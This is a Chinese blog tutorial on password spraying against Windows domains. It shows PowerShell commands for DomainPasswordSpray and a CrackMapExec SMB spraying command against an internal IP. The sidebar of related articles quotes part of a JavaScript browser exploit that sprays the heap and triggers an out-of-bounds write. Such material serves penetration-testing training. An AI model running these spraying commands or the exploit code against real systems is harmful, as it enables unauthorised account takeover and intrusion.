域渗透之密码喷洒攻击

最新推荐文章于 2024-05-14 04:04:33 发布
最新推荐文章于 2024-05-14 04:04:33 发布
阅读量1.5k 收藏 3
点赞数 1
分类专栏: 域渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/128296879
版权

目录

密码喷洒攻击(Password Spraying)

利用 DomainPasswordSpray

CrackMapExec 对域内进⾏密码喷洒

密码喷洒攻击(Password Spraying)

在实际渗透中,许多渗透测试人员和攻击者通常都会使用一种被称为 “密码喷洒”(Password Spraying)的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,因为它属于自动化密码猜测的一种。这种针对所有用户的自动密码猜测通常是为了避免帐户被锁定,因为针对同一个用户的连续密码猜测会导致帐户被锁定。所以只有对所有用户同时执行特定的密码登录尝试,才能增加破解的概率,消除帐户被锁定的概率。普通的爆破就是用户名固定,爆破密码,但是密码喷洒,是用固定的密码去跑用户名。

下面我们演示一下 Password Spraying 的具体攻击思路与过程。

利用 DomainPasswordSpray

项目地址:GitHub - dafthack/DomainPasswordSpray: DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain. By default it will automatically generate the userlist from the domain. BE VERY CAREFUL NOT TO LOCKOUT ACCOUNTS!

DomainPasswordSpray 是用 PowerShell 编写的工具,用于对域用户执行密码喷洒攻击。默认情况下,它将利用 LDAP 从域中导出用户列表,然后扣掉被锁定的用户,再用固定密码进行密码喷洒。

Import-Module .\DomainPasswordSpray.ps1 #导入模块
Invoke-DomainPasswordSpray -Password <密码>

可以看到运行结果

当然我们可以以字典的形式进行爆破

Invoke-DomainPasswordSpray -UserList users.txt -Domain GOD.org -PasswordList passlist.txt -OutFile sprayed-creds.txt

UserList:用户字典

Password:单个密码

PasswordList:密码字典

OutFile:输出的文件名

Domain:要爆破的域名

Force:强制喷洒继续,而不提示确认。

CrackMapExec 对域内进⾏密码喷洒

CrackMapExec(⼜名 CME)是⼀款⾮常好⽤的密码喷洒攻击的⼯具,在 Kali Linux 默认已经安装好。

下载地址: GitHub - Porchetta-Industries/CrackMapExec: A swiss army knife for pentesting networks

crackmapexec smb 10.10.10.12 -u users.txt -p 'admin!@#45' --continue-on-success
#creakmapexec smb IP -u <要爆破的用户列表> -p <密码>
怰月
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
火车车皮装煤防冻液自动喷洒控制系统设计
07-17
介绍了洗煤厂火车车皮装煤防冻液自动喷洒自动控制系统的设计思路、系统结构、工作原理和一般控制方法。针对空车喷洒的车皮检测与控制问题,提出具体技术方案。在PLC系统网络结构方面,给出了设计原则。系统实现了智能...
自制苗圃自动喷洒控制器
02-03
受当地一家苗圃之托,为其制作一台能自动喷洒的控制器代替人工定时喷洒,要求是开停时间可人工调整进行设定,如喷洒2分钟、停止30分钟,然后再喷洒2分钟、停止30分钟,这样周而复始地工作。自制的控制器电路如...
内网渗透下的密码喷洒
LiBai'S BLOG
09-27 5362
1、密码本来源途径(信息泄露、翻配置文件、翻回收站、桌面账号密码本、mimikatz抓到的)2、喷洒的时候工具尽量放到内网机器上面,本地使用工具的线程过高流量过大会导致隧道崩掉3、喷洒时可以针对一个C段进行,这样能爆出来的机器会有很多4、内网渗透中,能获取到主机管理员账号密码,将会使我们横向事半功倍,尤其是在大内网环境中,密码复用率很高,一波喷洒,能助力你拿到一波主机,对拿到的主机再次抓取密码,再用新拿到的密码喷洒一波…,如此反复。
用户枚举与密码喷洒
qq_18811919的博客
02-26 778
用户枚举与密码喷洒讲解了4种工具的使用
内网安全之密码喷洒_控内网喷洒
最新发布
2401_84968665的博客
05-14 815
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
什么是密码喷洒攻击
weixin_40191861的博客
04-04 358
密码喷洒攻击针对许多不同的账户、服务和组织尝试使用一个或两个通用密码,以此避免在单个账户上被检测或锁定。攻击者使用这种方法避免超过设定的账户锁定阈值,许多组织经常设置为输错三到五次就锁住账户。只要在锁定阈值内输对密码攻击者可以在整个组织成功尝试多个密码,不会被活动目录中的默认保护机制阻止。攻击者选择最终用户常用的密码和数学公式来猜测密码,或使用已在密码泄露网站上公布的泄露密码用户在设置密码时要求用户使用特殊字符和字母数字组合,并限制最小长度。使用随机数时,要确保用户无法获取随机数生成算法。
Security+ 学习笔记5 常见的网络攻击
tushanpeipei的博客
09-15 1131
一、口令攻击(Password attacks) 1.口令攻击 密码是当今绝大多数系统的安全保障。这种经过时间考验的方法确实为许多目的提供了足够的安全性,但它也有很多缺点。攻击者可以发动攻击,目标在破解存储在系统文件中的密码。许多攻击使用这种方法来窃取大量的用户账户。 在Linux系统中,密码文件包含了用户凭证。当用户试图登录一个系统时,登录过程会检查密码文件,以确定密码是否有效。现在,当然,该文件并不只是包含密码的副本。这样做很容易成为攻击者的目标,而且也会让系统管理员知道系统中所有的用户密码。相反,密码
浅谈暴力破解
Wawyw's Blog
07-19 4697
0x01 原理 ​ 暴力破解(brute force),又名暴力攻击、暴力猜解,从数学和逻辑学的角度,它属于穷举法在现实场景的运用。当密码未知或获得密码哈希时,攻击者会使用暴力破解来试图登录帐户,即通过利用大量猜测和穷举的方式来尝试获取用户口令的攻击方式。在ATT&CK中暴力破解有如下四种子技术。 Password Guessing(密码猜测) 事先不了解系统和环境,攻击者会猜测密码以尝试登录帐户。在不了解帐户密码的情况下,攻击者可能会在操作过程中通过使用常用密码字典来猜测登录密码,而无须事先了
不规则形喷洒的摇臂式喷头设计.ppt
01-07
"不规则形喷洒的摇臂式喷头设计" 本设计方案旨在解决传统圆形摇臂式喷头的缺陷,设计出一种能喷出任意形状喷洒的不规则形喷洒的摇臂式喷头。该设计基于传统圆形摇臂式喷头的基础上,对其进行改进和创新,旨在...
基于单片机的智能灌溉喷洒系统的设计
11-17
【标题】"基于单片机的智能灌溉喷洒系统的设计"是关于利用单片机技术构建智能化农业灌溉系统的项目。这种系统旨在提高农田灌溉效率,节约水资源,同时降低人工劳动强度,实现农业生产的自动化。 【描述】这个项目...
单片机控制的草坪喷头变喷洒系统.pdf
07-12
单片机控制的草坪喷头变喷洒系统.pdf
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具.zip
10-10
CrackMapExecWin, 为 Windows 编译的伟大CrackMapExec工具 CrackMapExecWin描述为 Windows 编译的伟大 CrackMapExec 工具特性最新 2.2 版本编译为 x86,因此应该在 x86 和 x64 平台上工作用法下载整个归档文件。提取并运行 cra
DomainPasswordSpray:DomainPasswordSpray是用PowerShell编写的工具,用于对用户执行密码喷雾攻击。 默认情况下,它将自动从中生成用户列表。 请务必不要锁定帐户!
05-01
DomainPasswordSpray DomainPasswordSpray是用PowerShell编写的工具,用于对用户执行密码喷雾攻击。 默认情况下,它将自动从中生成用户列表。 请务必不要锁定帐户! 快速入门指南 使用“ powershell.exe -exec旁路”从Windows命令行打开PowerShell终端。 键入“导入模块DomainPasswordSpray.ps1”。 进行密码喷雾的唯一必要选择是-Password(单个密码)或-PasswordList(密码列表)以尝试多次喷雾。 使用-PasswordList选项时,Invoke-DomainPasswordSpray将尝试从中收集帐户锁定观察窗口,并将每个观察窗口的喷雾限制为一个,以避免锁定帐户。 以下命令将自动从当前用户中生成用户列表,并尝试使用每个用户名和密码Spring2017进行身份验证
CrackMapExec
08-23
Python脚本编写的工具,集成了多个网络安全工具,安装方式:python setup.py install,注意,需联网,运行install以后会自动下载依赖库。kali2下亲测可用。
NiuBi!简单且匿名的密码喷洒工具
潇湘信安的博客
07-16 152
通过 Amazon AWS 直通代理启动密码喷洒/暴力破解,为每次身份验证尝试转移请求的 IP 地址。这会动态创建 FireProx API,以实现更规避的密码喷射。
横向移动之IPC&WMI&SMB&CrackMapExec密码喷射
qq_62989306的博客
07-10 481
IPC攻击流程:建立ipc$连接 --> copy命令上传后门文件 --> at命令计划任务执行后门文件,上线WMI&SMB攻击流程:抓取账号密码(需提权) --> 将后门放到web根目录下 -->套件或工具进行横向移动,执行命令下载web下的后门文件然后执行,上线CME工具:进行密码喷射,利用smb服务进行批量验证账密,执行命令下载后门然后执行,上线。
渗透用户账号密码爆破
good good study
03-24 4009
在常规的爆破中,我们都是先用很多密码去碰撞一个账号,这样很容易导致账号被锁定。而密码喷洒就是用一个密码去碰撞很多账号,此方法能有效的避免账号被锁定的问题获取了用户后,进行密码喷洒。首先可以查询密码策略(net accounts /domain),根据密码策略再构造爆破字典。
内网安全之密码喷洒
weixin_45910629的博客
04-06 982
密码喷洒一般和用户名枚举一起使用,可以在无内凭据的情况下,通过枚举出内存在的用户名,进而对内存在的用户名进行密码喷洒,以此来获得内有效凭据。在Kerberos协议认证的AS-REQ阶段,请求包cname对应的值是用户名,当用户名存在,密码正确和密码错误时,AS-REP的返回包不一样。这种针对所有用户的自动密码猜测通常是为了避免账户被锁定,因为如果目标设置了用户锁定策略的话,针对同一个用户的连续密码猜测会导致账户被锁定。
实力吊打国家黑客:从密码喷洒到完全控制网络只需几天
smellycat000的专栏
06-23 961
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队微软发布报告,详述了复杂的黑客组织如何能在不到一周的时间里,通过密码喷洒攻击一路完全控制网络。微软威胁防护情报团队指出,“每...
function main() { document.getElementById("go").style.display = 'none'; debug("---------- Phase 1: Obtaining Relative R/W Primitive ----------"); // Setup the corrupted arr for OOB write //debug("[*] Setting up the attack array..."); var arr = [1]; arr.length = 0x100000; arr.splice(0, 0x11); arr.length = 0xfffffff0; // Spray some target butterflies in CopiedSpace //debug("[*] Spraying target objects on the heap..."); var targetButterflies = []; for (var i = 0; i < sprayMax; i++) { targetButterflies[i] = []; targetButterflies[i].p0 = 0.0; targetButterflies[i].p1 = 0.1; targetButterflies[i].p2 = 0.2; targetButterflies[i].p3 = 0.3; targetButterflies[i].p4 = 0.4; targetButterflies[i].p5 = 0.5; targetButterflies[i].p6 = 0.6; targetButterflies[i].p7 = 0.7; targetButterflies[i].p8 = 0.8; targetButterflies[i].p9 = 0.9; for (var k = 0; k < 0x10; k++) { // We want to smash the length of the array to the max possible value targetButterflies[i][k] = u2d(0x7FFFFFFF, 0x7FEFFFFF); } } //debug("[*] Triggering memory corruption...."); // Trigger shift of memory contents to cause OOB write on a sprayed array arr.splice(0x1000, 0x0, 1); var targetIdx = -1; //debug("[*] Finding corrupted ArrayWithDouble for rel R/W...");请解释以上代码,描述包括注释在内的代码含义?
07-15
以上代码是程序的主要逻辑,包含了一系列操作。让我逐步解释代码的含义: 1. `document.getElementById("go").style.display = 'none';`:隐藏了ID为"go"的HTML元素。 2. `debug("---------- Phase 1: Obtaining Relative R/W Primitive ----------");`:调用了一个名为`debug`的函数,输出调试信息。此处输出了一个描述信息。 3. `var arr = [1];`:创建了一个包含一个元素1的数组。 4. `arr.length = 0x100000;`:将数组的长度设置为0x100000(1048576)。 5. `arr.splice(0, 0x11);`:从数组的索引0开始删除17个元素,相当于将数组的长度减少了17。 6. `arr.length = 0xfffffff0;`:将数组的长度设置为0xfffffff0(4294967272)。 7. 创建目标对象数组:通过循环创建了一个名为`targetButterflies`的目标对象数组,循环次数由`sprayMax`变量控制。 - 在每次循环中,创建一个空数组并将其赋值给`targetButterflies[i]`。 - 设置这个数组的属性`p0`到`p9`的值分别为0.0到0.9。 - 使用嵌套循环,将数组的前16个元素设置为一个特定的64位浮点数对象,其值为(0x7FFFFFFF, 0x7FEFFFFF)。 8. `arr.splice(0x1000, 0x0, 1);`:在数组的索引0x1000处插入一个值为1的元素。这个操作将导致内存内容的偏移,从而触发了对被修改的数组的越界写入。 9. `var targetIdx = -1;`:初始化一个变量`targetIdx`,并将其赋值为-1。 10. 在接下来的代码中,可能会继续寻找被破坏的`ArrayWithDouble`对象来实现相对读写操作,但是在提供的代码中并没有给出后续的代码。根据注释,后续代码可能会用于寻找破坏的数组对象和执行内存相关的操作。 以上就是代码的解释。根据代码中的注释,它主要涉及了创建数组、设置数组长度、填充数组元素、触发内存越界写入等操作。这些操作可能是为了实现后续的漏洞利用或内存相关的攻击

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值